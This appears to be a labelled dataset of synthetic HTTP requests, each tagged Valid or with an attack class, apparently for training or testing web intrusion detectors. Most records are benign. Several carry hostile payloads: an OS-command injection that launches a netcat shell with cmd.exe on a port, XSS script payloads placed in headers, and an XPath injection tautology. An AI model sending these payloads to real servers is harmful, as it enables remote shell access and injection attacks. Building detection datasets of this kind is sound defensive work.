UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/3.1 57.250.92.138:1, 4.4 www.39Rit3te.jpeg
Transfer-Encoding: deflate
Upgrade: hth/1.0
Warning: 109 34.121.129.24 "7lqe" "Mon, 29 Oct 07 23:17:08 CET"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47257
Start - Id: 18304
class: Valid
GET /iadnrh6ceqsInS/iedVkZT/hrpWzEMAhOL84oq8Z3X/itwh/t5xD/hdoaitlmSrbI6orc/tR2o7Vo/9j4XQKxS/9f3yNdJQ@WE@-38QRaTX/xjFzxm.exe?sTewsrnssNsrn=acceptwd&iat8beenmersa1P=++iae&Pb3k=rPbRy-m&raEc=680&ca9raa53foysdb=2503050&duhbeet=8754&rsoilhgbrnami=processing-instructionniR5%7E+s%2Fntepasswd&VQ9ITXI2u_N=hv1&IR40d=dehxhccdthcHPir&sr=e4fbq&5I4mW=ik0htsHrpion&otr=+eva HTTP/1.1
Host: www.urbue.de
Connection: keep-alive
Accept: audio/*;q=0.9, video/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3-e, sckft-P;q=0.3, lAtaerl-ebei8;q=0.8, ta-qi;q=0.7, nle-ovnzr
Cache-Control: max-stale=8643
Client-ip: 34.186.224.238
Cookie: lrguintpdr=Otrepe;EhtpsfmuttnwOle=oq@aUx5VkB;chmaync=2
Cookie2: $Version="2"
Date: Tue, 03 Feb 09 10:49:00 CET
ETag: "fKZ8peuxgdq_2ugbR"
Expect: 100-continue
From: gstN@lnddoWhdmn.fr
If-Modified-Since: Sat, 01 Jan 05 03:30:39 GMT
If-Unmodified-Since: Wed, 17 Sep 08 10:29:48 UTC
If-Match: "CdSYgpzipblqve2SA"
If-None-Match: *
If-Range: Fri, 11 Apr 08 12:57:45 UTC
Max-Forwards: 759
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM dWVhM3Joc3d4YXJ0YW9udVNhdEx4aWVtZWhkYWFoYXRhYmFpTA==
Authorization: NTLM b21paTFhbmZzaUdBeDI3dWlybmZjcnNkbm5uN3VsdDQ=
Range: 33-392,-2077,7-8592
Referer: /6eCh.cfm
TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.8 (Windows; U; WinNT 0.2; mT-rr; rv:2.6.9) Gecko/68145496
UA-CPU: PowerPC
UA-Disp: 644,336,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: Nwrmy/8.7 www.vennx.jpg, 5.0 www.aAsaewu.js
Transfer-Encoding: tEqsb; ieSh=t05vl
Upgrade: aeft/2.6, oxx/2.6
Warning: 514 67.147.194.108 "eiekiaraEa6" "Fri, 07 Oct 05 14:36:56 GMT"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 9583617026420490127
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18304
Start - Id: 17081
class: Valid
GET /gbFxx1FhNTc1@WYXXMHh/tUjhUhC7FaRaAU8N1/hFhPhF3x/x6DFZHlFxtCAo_9z/hWd.wL9QuTUqTcV4s/pkTuhdedt/EHlLDpasswdLVg8VaI/t7US4PbOKkY0mT/ITLwJvt18U.css?rmifZd=iHuinclude&es=boii8ozhSj%2Fs&eliauaetsoht=oekE%40tR3M&I3b8mEserviceslinkG=7743446625&dfAerLnuErq=%247qhn&DJvjvIh=8vi&gto5s4tblieua=90649590&apnodeCliboptEkLP0=7855071&z.WM=pK9Us39d&tn6=651559&igais3oS=%3E%3B9&aglseijx=5scripta&fhejsktstn=h1reltTiacf HTTP/1.0
Host: 22.130.231.5
Connection: close
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: identity, deflate, compress, deflate
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 187.180.35.173
Cookie: iir1BctE8=afrom:me+>oidnlsem& 7p;IZmGz7q54=cietptkedu;SdgdanxdtaysXg=152834;seglen=oskzr]mao
Cookie2: $Version="908"
Date: Sun, 26 Nov 06 21:07:52 UTC
ETag: "sl7pbnn@0pCL93xhw2"
Expect: 100-continue
From: mjsOfho@efDme.uk
If-Modified-Since: Sun, 05 Mar 06 01:12:17 UTC
If-Unmodified-Since: Thu, 25 Jun 09 14:48:52 GMT
If-Match: "v_x_A3CW5JBRGk."
If-None-Match: "ervK0Z1_JPHGc.iEAN"
If-Range: Sat, 15 Dec 07 07:16:52 GMT
Max-Forwards: 23
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic MWluc2I6OXRlYVRuc3Q=
Range: 13-,575-09299
Referer: http://www.crmayt.it/rRt37e/g7l8/ezec/dcra/ostLmizs.php3
TE: chunked;q=0.7,gzip
Trailer: Accept
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 4.8; st-Pm; rv:7.2.4) Gecko/65795356
UA-CPU: PowerPC
UA-Disp: 7520,867,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9333x8933
Via: HTTP/5.5 www.oqhi.htm
Transfer-Encoding: gzip
Upgrade: nuti/7.7, 4TEs/2.1, 4nqais/2.3, baaiD/4.1
Warning: 853 51.149.87.169 "aeHtkSbtamk" "Sun, 01 Jan 06 06:05:57 UTC"
X-Forwarded-For: 77.229.71.116
X-Serial-Number: 17174419292129745419
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17081
Start - Id: 9807
class: Valid
GET /X_McAg/ocbynmrmzcgqQo/QRBHCqynetcatp/eenem8ratfl1Te0rot/esdtaaneaEhthrotoao/Ikd7ykf0/SyfsUHdtonaibths/s_c9FCwrqXkzX/2oirYXQv@du/utwF5eCT9CyBBXtaBR/oHlksfKZuhxUC3aNZDM/GQinSrtb.php4?passthru11_3W13=wa1n4tn&hErXyo=t3&tpe6u69aelee=uta%26umochaAe&9tgeeeznp1te=amzYvuR&srtiOwgoclt6De=ri&elheu7stre7=bzaleiptugmhTbe2eg&hBevalMmDm=u&ejnn4l=5&or=oQHSiF&h8=1454273572&avrEoi=772&fIMTd7k=g2s HTTP/1.0
Host: 152.238.245.206
Connection: close
Accept: image/*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: compress, compress;q=0.2, gzip
Accept-Language: *
Cache-Control: max-stale=7
Client-ip: 142.252.165.176
Cookie: bWiylocation1w=3;UuAWyni2o=3mAkn;eaa=i62pdeEcA;aOztt=1519
Cookie2: $Version="17"
Date: Sun, 05 Sep 04 13:52:19 GMT
ETag: W/"rvGXJuKjElArHqEm7Xe9"
Expect: 100-continue
From: 9rLl@rrheE.org
If-Modified-Since: Thu, 03 Jan 08 05:54:25 GMT
If-Unmodified-Since: Sun, 28 Mar 10 20:48:21 CET
If-Match: "MFnHqFCSpxfFI4cD@3"
If-None-Match: *
If-Range: Sun, 13 May 07 01:37:01 UTC
Max-Forwards: 02
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest qop=dARhoRu
Authorization: Digest realm
Range: -988,03-4,64-3
Referer: /cldaE/r9dtnrt/eniel/loerraN/ocht.php4
TE: trailers,deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.7 (compatible; Konqueror/9.2; WinNT; mmdrnrWdtH; ao3n; n5heikaf)
UA-CPU: PowerPC
UA-Disp: 197,9034,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3832x6503
Via: 2.7 119.50.67.249:1544
Transfer-Encoding: identity
Upgrade: jaeNfe/6.3, eitr/9.7, Eia/7.9, ryge/4.3
Warning: 698 www.henrsinf.js "setsncEu3mh2ihzrest" "Sun, 01 Oct 06 12:14:24 UTC"
X-Forwarded-For: 239.251.116.128
X-Serial-Number: 3012101828224515543
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9807
Start - Id: 42853
class: OsCommanding
GET /2dnUl7ei1u/A1BhttpsRsnullCTVgJf/nGseslyrl3h/itbkIenseCprnc/l76fUdI7YdNRQ2XAH4ps/mdcesethsy/IOw6QqP/nmeaiseeEtd8sno/eIote/eisvylsngseVvt.exe?SNdrslsysreer=Dz%7C&jsAdIega8f=ta6&9tnihns9aanre=wag7eennieafEd&on=%7C++++shell%28+++++%22cmd++%2Fc+c%3AInetpubwwwrootMSISSnc.exe+-l++-p++5336+++++-t+-e+cmd.exe++++%22+++%29++++%7C+++%27 HTTP/1.1
Host: www.liauh.uk
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-10646-ucs-2, euc-cn
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-stale=33
Client-ip: 143.230.118.47
Cookie: 4eetU=tontu
Cookie2: $Version="840"
Date: Fri, 10 Jun 05 08:25:13 GMT
ETag: "Hojpf2RJeeu_ocT8l6Gw"
Expect: 100-continue
From: l6tz5hd@ruglhe.be
If-Modified-Since: Wed, 22 Oct 08 08:12:22 CET
If-Unmodified-Since: Fri, 15 Sep 06 10:12:28 UTC
If-Match: "fkLSiJSki10kEDYFuWrs"
If-None-Match: *
If-Range: Wed, 11 Jun 08 01:13:43 UTC
Max-Forwards: 2840
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: njdei gtdN=st7gs
Authorization: Basic bm9kZGRzc2c6b2FiYkY=
Range: -885,-18051
Referer: http://www.I9a8.cz/irllnd4n/oramneiq/jbisfu8n/thaS.css
TE: gzip,chunked
Trailer: Transfer-Encoding
User-Agent: ms0hsydssa (gjRkp5K; eqrL6slo4; eg1@d-Xp-9; htgpsID)
UA-CPU: MIPS
UA-Disp: 7817,3346,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.7 www.4aina.css, FTP/8.2 www.sh4tee.jpeg, HTTP/9.9 www.asFvet.css
Transfer-Encoding: ehlbn8
Upgrade: Rhetio/0.3, d5nIg/4.3
Warning: 831 253.234.94.229 "urhmxsr8a0ucgtYcTaym" "Thu, 10 Mar 05 12:24:31 GMT"
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42853
Start - Id: 23102
class: Valid
GET /aR5Pp8pLAVzs/ecqstzt/cquEldcZNR.ofrLu/SeyuPCNk.php4?nr3=14151567&ntedSxeseeendhi=%3BwiwtIsnBoE&qeiohemawdae=e%2Bhod HTTP/1.0
Host: 195.131.179.155
Connection: keep-alive
Accept: video/*;q=0.2, audio/x-wav;q=0.1, video/quicktime
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.0, gzip;q=0.3, identity;q=0.5, compress;q=0.7
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 164.78.31.224
Cookie: grr5fvT8o7e7gt=nnm msr;6s7DueodE2lghht=400809
Cookie2: $Version="505"
Date: Wed, 16 Jun 04 18:14:55 GMT
ETag: W/"t15mmUNACPbF9yvF1h8d"
Expect: 1n9t=7ked;nliad=tiEirie7
From: Hocan@osthutarg1.biz
If-Modified-Since: Thu, 16 Jun 05 03:11:57 CET
If-Unmodified-Since: Thu, 20 Jan 05 21:49:59 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Sep 05 05:52:48 UTC
Max-Forwards: 0
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM QWR0dGRlY2Fhc2Rkb2hzbDFlcmU5YnB1N2FoaWlyYThv
Range: 189-,863-
Referer: /uscaEacT/nnde.asp
TE: deflate;q=0.3
Trailer: Accept
User-Agent: aeai0sslN
UA-CPU: Sparc
UA-Disp: 784,1462,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0764x660
Via: FTP/5.5 68.48.17.176
Transfer-Encoding: compress
Upgrade: raife3/4.4, tde/7.8, hre/2.4, wcct/1.7
Warning: 770 123.137.130.236 "6enewerc5oeejdr" "Tue, 23 Aug 05 16:07:21 CET"
X-Forwarded-For: 73.70.52.35
X-Serial-Number: 18684889581671575
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23102
Start - Id: 8907
class: Valid
GET /a2rn8J7M2K2D/t1he.nsf?4cnIj=sPDw9qXL&wSiacprAn=mFAuwkn&egome6whn3=2092741857&b6Naec8l3=cNGVVU8fNr&aTheAnD5e=6331827&Eiwt5OwysiTee=rhw9thi3&Cgt50esar=n+ma+1&keer=lthrukhohttpft0etci HTTP/1.0
Host: 213.102.43.197:8779
Connection: keep-alive
Accept: video/*;q=0.5, application/*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.2, compress, gzip, identity;q=0.5
Accept-Language: *;q=0.9
Cache-Control: min-fresh=7161
Client-ip: 178.118.114.226
Cookie: 6ZN9tEfjhwn=eoptvbscripteu;asiennftg=6f >gumyd~sle? n;hisi=82
Cookie2: $Version="266"
Date: Thu, 28 May 09 15:47:35 UTC
ETag: "o_YERB0dpVOt2YXC"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Mon, 04 Oct 04 17:22:45 CET
If-Unmodified-Since: Thu, 02 Aug 07 19:06:11 UTC
If-Match: "V_ZpS2be1Ns6TmB5x"
If-None-Match: "J41NEoiNYYC_GZ7b"
If-Range: Sun, 14 Jan 07 15:00:50 GMT
Max-Forwards: 8
MIME-Version: 7.9
Pragma: u5stz=rmr
Proxy-Authorization: NTLM ZGVuZDRtZ2hyY3Jub29ld3RhZWZoZnBrc0E5T2NNZWVtcGlheGdIbEllUm1la2Rn
Authorization: Digest uri=/ncls.exe
Range: 195341-892,301-417,85-
Referer: /note/shnnBr/ndshc/ehfeFaeE.jpg
TE: chunked;q=0.4,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/8.1 (Windows; U; WinNT 0.9; Bu-ee; rv:3.9.8) Gecko/55010806
UA-CPU: 68000
UA-Disp: 0013,2621,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x5970
Via: HTTP/8.3 145.159.52.95
Transfer-Encoding: deflate
Upgrade: ne7b/6.5
Warning: 052 65.130.149.140 "iFomeu7jcadiest" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8907
Start - Id: 9052
class: Valid
GET /rO1lhH/auhWyG6vShAuQ/toujze/a87Ees3ryis2afthEudc/inyFz_L7ST@/eGbmeyenmPenrinhNry/XFHBobjectcopyhi/isrO4Hob4rpjeheedf/2vfQ5g.dll?oDtltsrpzsge=3&hsie2tslpshn=b6tsRjTDAv&_s5hreplacecopy3xe4=gn&talseth=h%282selecthte0-ag%2Fncb&ehecnnyeese1=992&tg7feighTh=61084617&owh=xbHOPa&miec=lz5cmrnees7e HTTP/1.0
Host: www.DarFTsaMb.net
Connection: close
Accept: text/*;q=0.3, image/*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 168.206.47.117
Cookie: thlaebshxqer=266402664;nksehce=dm02DzLX7N;fzdal=tcikeaEhoiiesE;mi=qgYoe;YZMIxp_MHXhN=80;metawwgettSz3JtconnectV1=ye/elr6a6
Cookie2: $Version="9"
Date: Sat, 15 Dec 07 13:09:59 CET
ETag: "KoTQ8MRH79vQlgwbG_"
Expect: mjl9tid
From: nYe8@Sqo1l5.uk
If-Modified-Since: Sat, 06 Jun 09 12:59:55 UTC
If-Unmodified-Since: Fri, 20 May 05 01:13:24 CET
If-Match: *
If-None-Match: "D189zS0Jnvs8@-ad@"
If-Range: Fri, 19 Jan 07 11:40:24 UTC
Max-Forwards: 666
MIME-Version: 8.0
Pragma: fetfd0='g'
Proxy-Authorization: Digest uri=/Otel0DNt.asp
Authorization: NTLM amw4YW1pVGhvdmNvYXY1c3N0ZFVscHhzcm5JRWloc2ppTlJua2F1ZDJycg==
Range: -9,-8753
Referer: http://www.bh2nhf.net/Nlcxm/sda2eewj/ndqfz/gtpvnG.rar
TE: deflate
Trailer: TE
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 7.1; am-4L; rv:3.1.0) Gecko/61731445
UA-CPU: 68000
UA-Disp: 539,7615,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 842x671
Via: 9.6 111.212.189.137, 5.3 239.206.196.81
Transfer-Encoding: visi
Upgrade: oicaw0/1.6, fIvar4/1.2, iut7eu/0.8, 8nbl/3.1, 0ehUrq/7.3
Warning: 394 66.20.115.11 "wuelrtshiipI1Cr9mi" "Mon, 05 May 08 03:16:51 CET"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 442361
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9052
Start - Id: 46609
class: XSS
GET /e5/eagn85eizhoei37x.gif? HTTP/1.0
Host: www.zftan.ch
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw;q=0.6, iso-2022-jp;q=0.4, iso-8859-8;q=0.3
Accept-Encoding: *
Accept-Language: <xml id   ="     X  "    ><a   ><b    >&lt;script>[alert  ('1dz1');]&lt;/script    >;</b></a  ></xml>
Cache-Control: max-stale
Client-ip: 42.100.67.21
Cookie: mftSSe=206;9tuwnc2nenls=imstylepnaaIyoldse;4TpasswdPnph-w1I3s=4;zaR=1
Cookie2: $Version="5"
Date: Sun, 08 Oct 06 09:03:47 CET
ETag: W/"i1SzQL9_A_G6IGY"
Expect: 100-continue
From: u3eali@lfioeyoua2.it
If-Modified-Since: Sun, 06 Mar 05 12:11:18 GMT
If-Unmodified-Since: Fri, 18 Feb 05 05:49:33 GMT
If-Match: "azZgVZ@U8xVGB46nAqRs"
If-None-Match: *
If-Range: *
Max-Forwards: 79
MIME-Version: 1.9
Pragma: ttbdoiew=e8
Proxy-Authorization: Digest username="6LlGdn"
Authorization: Basic ZW1lcjFxczI6dU8zajA2cw==
Range: 29-,197659-,4-7273
Referer: http://www.REUncdw.st/leiae/akrq2/wrwztxc/ArleTa.png
TE: trailers,deflate,deflate;q=0.9
Trailer: Host
User-Agent: Mozilla/0.3 (Windows; U; Win98 9.2; iv-r8; rv:9.0.7) Gecko/16196727
UA-CPU: PowerPC
UA-Disp: 7714,181,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: 9.6 6.62.12.50, HTTP/0.7 www.ldtemnnn.css
Transfer-Encoding: deflate
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 105 192.184.242.29 "Ttdmeee" 
X-Forwarded-For: 245.134.55.175
X-Serial-Number: 36731
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46609
Start - Id: 16214
class: Valid
GET /ivwUC/yTgOxatsnea/e@aXVpw/py/tsosuti4sn/@9H8vgaMP/lrn/r5d3ZXbZDt89_2JGpb/soFEbRJqj/snttbseueimeshhevv/qe8lsCtp.dll? HTTP/1.0
Host: 90.233.15.244
Connection: cRee
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: fzOuasCe-t, sioonv-6aa;q=0.2
Cache-Control: Fipenit='ceadraxy'
Client-ip: 134.243.132.41
Cookie: ulo=e;siureo3tlsrntt=249349;ne=f;r9zIh=@ei3 em5acmd;leJfet=gnnyo;otnLekheemcon=Hehzwpndnr
Cookie2: $Version="07"
Date: Mon, 26 Dec 05 05:40:52 UTC
ETag: "g4O.w5Dsjj.mKqy0y9z"
Expect: alfo
From: ayzaa@q0mhuylt.cz
If-Modified-Since: Mon, 03 Aug 09 01:35:06 GMT
If-Unmodified-Since: Tue, 10 Jan 06 13:23:39 UTC
If-Match: "G@0JsDvi8xkzK63eB2XJ"
If-None-Match: *
If-Range: *
Max-Forwards: 2766
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest username="nEaw"
Authorization: Basic dWVENmRWZmk6YXdyMw==
Range: -1,640-,-33570
Referer: /adaurntd/8eeDont/thac/emtln5nt/RreTslim.gz
TE: trailers
Trailer: Max-Forwards
User-Agent: xiveieiEi1aoeooea6
UA-CPU: PowerPC
UA-Disp: 202,714,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7316x082
Via: w7tao/7.2 www.oaoe7Of.tiff
Transfer-Encoding: gzip
Upgrade: tnl/8.4, hvmlz/2.3, sn2fh/0.4, tEir/3.1, eEcar/0.7
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 113.16.19.192
X-Serial-Number: 1816915028
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16214
Start - Id: 12672
class: Valid
GET /eliaAt/H6/4xVgAQgRYbM@/e-57lWZfnz3ILiVvTyl/ocssfCC/fh/pTYdL@zi9DA2XTu.jpg?oemhenoqase=reie8r&en9=seNuFPe&ei=zyojhzegttsfnh3doj&ZFhavingGWzq7R=idla%3Eiac&d36oahiw9=73&tr7Noehcewidf9=ph5a&eiGe=aJyN2S-ZkUc&xifW2eanaFsdi=asloSe&E.iH=l%7Ce&nastiarq3w=%3Fsystemmt&rrneilf7leE=10820468&Yn=nWnaq&mrupdd9nwou=tFE HTTP/1.1
Host: www.orfEe.st
Connection: close
Accept: image/*;q=0.5, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: u-fwctutOr;q=0.0
Cache-Control: only-if-cached
Client-ip: 106.196.115.151
Cookie: olff=WnAitdntidid;ny0traA=mcdnmi4Oew;ovty6aNp=4983772154;oe=17
Cookie2: $Version="6"
Date: Mon, 26 May 08 06:42:17 CET
ETag: "Z6bDR6ol6FudYgKgsa"
Expect: 100-continue
From: Wno4tsep@oNhaeon.biz
If-Modified-Since: Mon, 28 Aug 06 11:47:11 GMT
If-Unmodified-Since: Thu, 23 Feb 06 10:48:02 GMT
If-Match: *
If-None-Match: *
If-Range: "nCEW_cj-9y.w9fU"
Max-Forwards: 3
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: NTLM dDZocGFoY2FlbXZsN3JzZVN0R25OMXJyZXRvZnRlT2U=
Authorization: sd1kn momio=sfoet
Range: 123920-
Referer: http://zoit.biz/aipah3o.msf
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: fir5n (rjA@JMCcuL; h5qZMs@; uM5xoVkBN; s1olvta; uAXKvMwP)
UA-CPU: PowerPC
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 118x1271
Via: 3.2 42.166.217.106:3869, 3.8 20.106.35.60
Transfer-Encoding: r8eEH; rhus=l9el2uc
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 604 0.169.62.121 "ntoiigc3nubtmi3tnc" 
X-Forwarded-For: 158.192.234.112
X-Serial-Number: 444066878
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 12672
Start - Id: 23723
class: Valid
GET /0tEotaoos/qhti2mNcaqc7ptka/aIy4TfqUf@/hattdecie/tvp41ZAzqb1vpzW0coy4/6OPX-bV/rBbOX0ww6cw.H/lUZ7gMwJfEpIv5nBCTX1.swf?ev=nkERiV4q0 HTTP/1.0
Host: 52.70.141.35:27054
Connection: IliAzs
Accept: application/*;q=0.6, application/rtf;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 13.117.64.92
Cookie: nsojA=tetooosloewja6;hpra=ekvcTa<gna qNss
Cookie2: $Version="45"
Date: Sat, 08 Jan 05 22:32:18 UTC
ETag: W/"XNE2Ei4pOYWMUMOWeFS"
Expect: 100-continue
From: SDcfto@h1dceuR3.cz
If-Modified-Since: Mon, 19 Nov 07 13:50:06 UTC
If-Unmodified-Since: Mon, 12 Feb 07 21:59:08 CET
If-Match: *
If-None-Match: "TQ9vzwAY4Ou5JU@HHn2"
If-Range: *
Max-Forwards: 3
MIME-Version: 4.4
Pragma: a=sphwh2It
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: dsuae otp9=inl7iat
Range: 88-,49-031,14468-474
Referer: /e6gutfp/rknnurts/tpoz.php
TE: trailers,gzip;q=0.2
Trailer: If-None-Match
User-Agent: sMs4oeralr/1.2
UA-CPU: Sparc
UA-Disp: 807,314,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 431x276
Via: 6.2 200.240.125.212:79, 8.5 105.155.161.198
Transfer-Encoding: compress
Upgrade: Oias/7.2, yee/0.3
Warning: 169 20.110.71.138:174 "Xuulgeai2thhnsm" "Tue, 19 May 09 22:55:23 CET"
X-Forwarded-For: 204.159.198.225
X-Serial-Number: 13224
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23723
Start - Id: 46601
class: XSS
GET /and6o0J/cD/Xb89/zei/s8s_y9sS/nRTGE_pbNG-Df/taigj4btun5/Ru.sh? HTTP/1.1
Host: 197.125.126.134
Connection: ti1ra
Accept: */*
Accept-Charset: *
Accept-Encoding: <a  href=  "    javas&#99;ript&#35;[alert ('8oteimayce');]">
Accept-Language: *
Cache-Control: min-fresh=13
Client-ip: 115.60.4.78
Date: Sat, 27 Jan 07 03:39:00 UTC
ETag: "p4RgaL7YZPVTzEy51c1@"
From: Jthbz@Aett6xa.be
If-Modified-Since: Wed, 27 May 09 17:13:43 CET
If-Match: *
If-Range: Sun, 15 Jan 06 21:47:43 CET
Max-Forwards: 4
MIME-Version: 0.9
Pragma: no-cache
Authorization: Basic c2FqbnJwbjpkczJlYW8=
Range: 29-,197659-,4-7273
Referer: /Rna5ae/ti4drytS/fh5sW.gif
TE: trailers,trailers
User-Agent: euwgH2VbNs http://www.tprU.org
UA-CPU: x86
Via: 0.5 217.0.185.219, FTP/8.7 124.141.132.0, 7.9 www.sptgp.htm
Transfer-Encoding: identity
Upgrade: 1ssnt/2.7, Necil/0.4

null

End - Id: 46601
Start - Id: 32020
class: Valid
GET /ow2AJgKaoMchyS2P/szvm9GZROD1mWnQg-y/u-fw3W8b6uj4-@1@@/oo/oylvt/lYCsREIsNK9OXY2qNH/n8rh1lt/atae/ebqH8ebd3mT/pOXsU5xB8y0BMfSbC.php?nldgeleMtamo=958411&ilmta5Ralteo1o=clonbd&m5dv9sh0ttou=sal-&rraussnao0R=g7e%26och&oc=tasxhdsx7uabawti&lr7oAabh=llT HTTP/1.1
Host: www.ded8ladx.net
Connection: ectps
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 0Ncmuy-h;q=0.5
Cache-Control: no-cache
Client-ip: 48.16.67.231
Cookie: Lk=2;3ewarophgt=18242724;AswtthmT6eFap=rmeD3eecu;ibrtsoh=e|t5sSphp;hn8eetithdl='rsem]ss|ye;ys=anr1aoyeab=ii
Cookie2: $Version="946"
Date: Sun, 03 Jun 07 21:36:00 CET
ETag: W/"qNnEjIF_yVwKAiu5"
Expect: 100-continue
From: foete@taatit2Jr.de
If-Modified-Since: Sat, 30 Jan 10 03:35:01 UTC
If-Unmodified-Since: Fri, 11 Aug 06 24:00:51 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Apr 07 12:46:35 UTC
Max-Forwards: 0
MIME-Version: 0.7
Pragma: baNj4=rtdmtsg
Proxy-Authorization: NTLM a3V0dW5xZmhmNGloaWZpaW5lc3Voek84cmFhYWR1ZzFyaGFpZmJPZXQzcHll
Authorization: anmni p1eun2ek=2usqs2
Range: 066322-
Referer: http://www.asuh1nnA.net/gHtet/se0enrt/ta0to6R/ttneuh.asmx
TE: chunked;q=0.2,trailers,trailers
Trailer: Upgrade
User-Agent: sialo/0.3
UA-CPU: x86
UA-Disp: 0659,464,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8661x2250
Via: FTP/1.2 www.donex.html, HTTP/1.5 73.105.244.172
Transfer-Encoding: gzip
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 588 www.nwTa.shtml "bbpiwtiL" 
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 2079694360100759
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32020
Start - Id: 35864
class: XPathInjection
GET /nHVvttbr/rwneiy/aMQDLMLWsd-GO4/e7Pl1BVUYSpY4@2/bvUIZkepg9H2r/kea5i.nsf?tacdritoee7wh=x%2Fwro%2Fd%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D036%5D+++++%7C+++wr%2FsSl%2Fsre%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D53%5D+++++or+++%27ecIoep%27+%3D++++%27 HTTP/1.0
Host: www.awr0r.st
Connection: tmv0
Accept: application/*, text/html;q=0.9
Accept-Charset: iso-10646-ucs-2, us-ascii, iso-10646-ucs-2, x-mac-arabic;q=0.3
Accept-Encoding: *
Accept-Language: s-5Po9i, lo4-i;q=0.0, sa2vf-js;q=0.3, L-znse3au;q=0.9, s-a;q=0.0
Cache-Control: no-transform
Client-ip: 155.41.173.240
Cookie: cv52nptpo7hh=s-rsQXXVjKTv;moja9rhem=237;rRstEpirbtnone=P;erptahr=eNZJP;qoo=nSrlreepuEr
Cookie2: $Version="3"
Date: Thu, 04 May 06 07:32:37 GMT
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: nviar
From: alcSeiee@shniectns.be
